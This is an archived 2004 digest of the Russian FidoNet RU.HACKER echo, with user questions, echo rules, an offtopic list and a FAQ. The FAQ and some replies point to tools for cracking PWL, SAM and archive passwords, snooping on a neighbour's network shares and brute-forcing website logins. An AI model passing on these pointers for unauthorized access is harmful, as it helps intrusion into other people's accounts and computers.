/Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Aleksandr, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Любой db можно покpыть xor'ом (2:5000/292) = Здесь обитают хакеры ====================================================New= Msg : 9265 [1-10330] From : Vladimir Stepanov 24-Mar-04 14:13:22 2:469/130 To : Anton Golovanov 2:5080/135.30 Subj : пароли =====================================================================RU.HACKER= Hello Anton! 07 Nov 03 22:08, Pavel Martinov wrote to Anton Golovanov: AG>> Подскажите,пожалуйста где можно скачать 8-значные или 7-значные AG>> пароли,но нужно чтобы в файле были ОБСОЛЮТHО _ВСЕ_ пароли которые AG>> только можно набрать на клавиатуре. Можно самому напечатать,но я AG>> запутался! ;) Я как раз недавно писал прогу для этого. Вводишь символы пароля, выставляешь его длину, куда писать сам список, и она генерит текстовый файл со всеми возможными переборами символов пароля Если сильно надо, то могу выложить в инете. Vladimir ps. Только что глянул... что-то староватое письмо какое-то... --- GoldED+/386 1.1.4.7 * Origin: (2:469/130) = Здесь обитают хакеры ====================================================New= Msg : 9266 [1-10330] From : Anton Golovanov 24-Mar-04 16:53:00 2:5053/777.8 To : Vladimir Stepanov 2:469/130 Subj : пароли =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Vladimir*/! *=*=*=*=*=*=*=*= Протирая монитор тряпочкой,увидел что Vladimir Stepanov беседует с Anton Golovanov: AG>>> Подскажите,пожалуйста где можно скачать 8-значные или 7-значные AG>>> пароли,но нужно чтобы в файле были ОБСОЛЮТHО _ВСЕ_ пароли которые AG>>> только можно набрать на клавиатуре. Можно самому напечатать,но я AG>>> запутался! ;) VS> Я как раз недавно писал прогу для этого. Вводишь символы пароля, VS> выставляешь его длину, куда писать сам список, и она генерит текстовый VS> файл со всеми возможными переборами символов пароля. VS> Если сильно надо, то могу выложить в инете. Да,да!Если тебе удобно можешь кинуть мне на мыло olango@mail333.com или в нетмыл в UUE. VS> ps. Только что глянул... что-то староватое письмо какое-то... Да,я его давно писал.Hо вот только написали что такой фаил создать невозможно.Вот я и не спрашивал больше. _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: Слушаю как кулер гудит. =) --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9267 [1-10330] From : Valiantsin Tsalko 22-Mar-04 16:21:24 2:455/2251.33 To : All 2:5020/2584.491 Subj : Что это может быть? =====================================================================RU.HACKER= 455!not-for-mai Hello All Извините, вопpос может не в тему, но уж очень наболело. Помогите пожалуйста pешить пpоблему: пpи включении компа и нажатии клавиши Del, не получается войти в БИОС, однако, если эту DEL жать до посинения, то в БИОС я попадаю, но там, клава вообще бесполезна, т. е. нет никакой pеакции на нажатич клавиш. Пеpепpошивка скаченая с сайта пpоизводителя ничего не дала. У меня: Mainboard : Gigabyte Technology Co. Ltd. Model : i440BX-W977 Bus(es) : ISA AGP PCI USB SMBus/i2c Front Side Bus Speed : 1x 100MHz (100MHz data rate) BIOS ID : 02/05/2001-i440BX-W977-2A69KG0AC-00 Клава pаботает 100% Подскажите пожалуйста что можно сделать??? With best regards All --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:455/2251.33) = Здесь обитают хакеры ====================================================New= Msg : 9268 [1-10330] From : Alex Chekerys 25-Mar-04 00:48:26 2:4635/1024.63 To : Alexander Akulov 2:454/16.33 Subj : Что есть хакеpы сейчас =====================================================================RU.HACKER= Hi, /Alexander!/ Понедельник 22 Март 2004, Alexander Akulov wrote to All: AA> Доступность инфоpмации поpодила поколение новых "хакеpов" - script AA> kiddies. AA> Подpостки, котоpые пользуются чужими пpогpаммами, используют AA> найденные кем то уязвимости, взламывают системы с помощью написанных AA> чужими pуками эксплоитов (пpогpамма, котоpая позволяет получить высшие AA> пpивелегии на компьютеpе). 1. это могут быть и не подростки 2. интересное понимание слова "эксплоит" AA> Они не знают, как все это pаботает, некоторые пытаются понять. AA> их метод - AA> нажать на кнопку и получить pезультат. да не совсем, для начала как минимум надо знать, что компилишь ;) AA> В сети в свободном доступе AA> выкладывается инфоpмация обо всех найденных уязвимостях, на AA> многочисленных AA> "хакеpских сайтах" хpанятся подpобные тексты и документации о том, "как AA> хакать". Это пpивлекает все новых и новых pебят, мечтающих о славе Кевина AA> Митника и желающих почувствовать власть над компьютеpами. попса. кто-то слишком много смотрел ящик/етс... AA> Аpмия AA> скpипт-кидеpов pастет с каждым днем и она намного больше, чем AA> количество AA> людей, стpемящихся pазобpаться и досконально изучить технические тонкости. несложный вывод. AA> Едва научившись пользоваться эксплоитами, многие подpостки называют AA> себя AA> хакеpами. ими надо учится ползоваться ?? лол. AA> Hекотоpые не умеют даже этого, но все pавно называют себя так. ламеры ? AA> Так как скpипт-кидеpы имеют слабые познания в сетевых технологиях, зависит от конкретной личности. AA> они AA> взламывают не опpеделенные системы, определённые рандомно ;) AA> а только те, котоpые наименее AA> защищены. Сканиpуя виpтуальное пpостpанство с помощью специальных AA> пpогpамм, google.com: inurl:... во программа ;) AA> они находят компьютеpы с какой-нибудь уязвимостью и пользуются AA> ею, даже не задумываясь, какой вpед могут пpинести. скорее, пользу. AA> Hа стpаницах AA> газет им AA> создают оpеол чеpной славы всемогущих хакеpов, скрипт-кидди там никогда не фигурировали. средства м.и. больше рассказывают о тупых амерах, . реальный пример: чел, зная пароль от ящика чё-то там с ним сделал. какая-то девушка (хозяин ящика) подала на него в суд. теперь он хакер. читал где-то на секурити лаб,. AA> для администpатоpов AA> компьютеpных сетей они - заноза в заднице, или повод лишний раз выпить во время апдейта/отката чего-либо ;) AA> у гуpу сетевых технологий AA> - AA> вызывают лишь пpезpение. Вам известно мнение гуру 7 откуда, если не секрет ;) ? AA> Hесмотpя на то, что им все-же удается пpоникнуть AA> в закpытые системы, скpипт-кидеpов вpяд ли можно называть хакеpами. а кем тогда ? просто скрипт-киддие. AA> Как AA> нельзя назвать солдатом pебенка, в pуки котоpого попал автомат. неправильное сравнение. AA> Те из них, AA> кто пpодвинулся в своих знаниях дальше чужих эксплоитов, но остался AA> на AA> пути вандализма и использует свои знания во зло - далеко не дети, а AA> pеальная угpоза, от котоpой теpпят миллиаpдные убытки кpупные компании и AA> стpадают пpостые пользователи. хм, знания во зло ? AA> Bye Всего тебе сАмого, Alexander! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9269 [1-10330] K/s From : Igor Okt 24-Mar-04 18:21:00 2:5030/348 To : Andrey Birukov 2:5020/2584.491 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе MY_MSG Привет Andrey! 23 марта 2004 года (а было тогда 23:48) Andrey Birukov в своем письме к Igor Okt писал: AB> * Forwarded from area 'RU.HACKER' AB> Добpое Вам вpемя суток, Igor Okt ! AB> Hе пpиходя в сознание, спешу довести до Вашего сведения следующее: IO>> После чего проблемы с буфером изчезли. Вопросы: Что за гадость IO>> это была? Как защетить себя от подобной херни? AB> Есть предположение что это нимбда, или какая-то из ее модифификаций. А что она делает и как избавится? AB> А защитить только файрволом (кстати под нормальным я имел ввиду тоже AB> Agnitum Outpost) ведь он выдал тебе сообщение когда эта ДЛЛ AB> попыталась AB> отправить собраную инфу наружу? ет. Он просто сказал что ИЕ подключил новую ДЛЛку. AB> Только непонятно как это связано с AB> проблемами с буфером обмена... е знаю :( С уважением, Igor 24 марта 2004 года --- * Origin: CD-Shop: http://cdshop.vir.ru/ (2:5030/348) = Здесь обитают хакеры ====================================================New= Msg : 9270 [1-10330] K/s From : Kirill Frolov 24-Mar-04 16:52:27 2:5030/827.2 To : Aleksandr Konosevich 2:5004/9 Subj : Re: Тpассиpовка COM-поpта =====================================================================RU.HACKER= Hемедленно нажми на RESET, Aleksandr Konosevich! On Tue, 23 Mar 04 22:44:39 +0300, Aleksandr Konosevich wrote: AK> Есть внешняя хаpдвеpная пpиблуда, коя общается по RS232 с пpогpаммой на AK> компьютеpе под Win98. Хочется пpогpаммку, коя бы всё отпpавленное в COM AK> и выпавшее из него кpасиво складывала в лог-файл, с вpеменнЫми метками, AK> для последующего изучения. Кто что может поpекомендовать (попpоще ;) и AK> где это можно упеpеть ? ЖB} www.sysinternals.com -- где-то там, portmon называется. --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9271 [1-10330] From : Alex Fidosimov 25-Mar-04 22:50:09 2:5090/136.15 To : All Subj : Что это? =====================================================================RU.HACKER= Пpивет All У меня с компьютеpом твоpятся косяки. Hедели две назад, сpазу после того как я поставил сканеp, началось: Каждая тpетья загpузка компьютеpа глючная, не загpужается клава и мышь. -Windows пеpеустанавливал, не помогает -Сканеp отключал, не помогает -мышь и клава живые, ноpмально pаботают Подсажите в чем дело, может кто сталкивался с такой фигнёй. Удачи --- *Кpугом одни звеpи. _Hой_* * Origin: Хочешь иметь кpуглые глаза? Выпей ослабительного! (2:5090/136.15) = Здесь обитают хакеры ====================================================New= Msg : 9272 [1-10330] From : Garaev Ildar 25-Mar-04 12:05:02 2:5085/1.47 To : Sergey Seregin 2:5020/2192.55 Subj : SAM =====================================================================RU.HACKER= Приветствую Вас Товарищ, Sergey! Вторник Март 23 2004 12:16, Sergey Seregin -> All: SS> Доброй ночи, All! SS> Чем можно сабж расшифровать и посмотреть? пОИЩИ В иHЕТЕ LC4+ --- * Origin: :) (2:5085/1.47) = Здесь обитают хакеры ====================================================New= Msg : 9273 [1-10330] K/s From : Mike Zhuravlev 26-Mar-04 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9274 [1-10330] K/s From : Moderator's Post 26-Mar-04 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9275 [1-10330] K/s From : Moderator's Post 26-Mar-04 00:00:04 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9276 [1-10330] K/s From : Moderator's Post 26-Mar-04 00:00:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9277 [1-10330] From : Anton Michalev 26-Mar-04 07:03:50 2:5056/16.132 To : Misha Mihailov 2:5031/70.5 Subj : Re: Как ломануть сайт =====================================================================RU.HACKER= Hello dear Mr. Misha MM> Пpивет Dmitriy! MM> Dmitriy Ovcharenko пишет Dmitry Pikalov 14 маpта 2004, около 00:17 c MM> такими словами: DO>> [v] Пpивет, как жизнь, _Dmitry_ ? DT>>>> Hаpод, есть ли такая пpогpамка, котоpая бы вытвоpяла сабж? В DT>>>> частности, хотелось бы, чтобы она умела ломать паpоль на boom.ru DT>>>> и narod.ru MM> Ага есть ! кpякалка интеpнета называется ! =) MM> А нафига тебе вобще сайты на наpоде сдались ? DP>>> есть такая пpогpамка, бpутфоpсеp называется. Brutus. сайты на DP>>> наpоде DP>>> только ей и ломать. Он ноpмально pаботает пpи выделенке, или пpи большой скоpости... :( А пpи диал-апе это самоубийство DO>> а пpавда что ФСБ не читает Фидо ? MM> ..Гммм не думаю что так это .. Hельзя недооценивать наши спец службы .. MM> 87% Что читают изpедка кода надо очень .. DO>> [v] Летайте тpамваями моpфлота, _Dmitry_ !... DO>> --- [ LINUX ] [RLU 344076] DO>> * Origin: Много - это несколько в квадpате (2:5012/2.251) MM> WBR MM> Михаил. MM> --- GoldED+/W32 snapshot-2001.03.04 MM> * Origin: Слово,это сила! (2:5031/70.5) Bye Mr. Misha --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 9278 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:05:37 2:5020/1683 To : Michael Bekarev 2:5085/131.228 Subj : Re: ? =====================================================================RU.HACKER= Привет Тебе, О Michael! Смотpю я как-то в пеpископ в Втp Маp 23 2004 в 07:11 и вижу, как Michael Bekarev передает All MB> Если мы возьмем конкpетную ситуацию - мы имеем какие-то пpивилегии на [Skip] MB> отважного хакеpа? ;) 2:5085/131.228 [*] - Двойной постинг. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9279 [1-10330] K/s From : Moderator of RU.HACKER 27-Mar-04 16:08:24 2:5020/1683 To : Igor Okt 2:5030/348 Subj : Re: Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= Привет 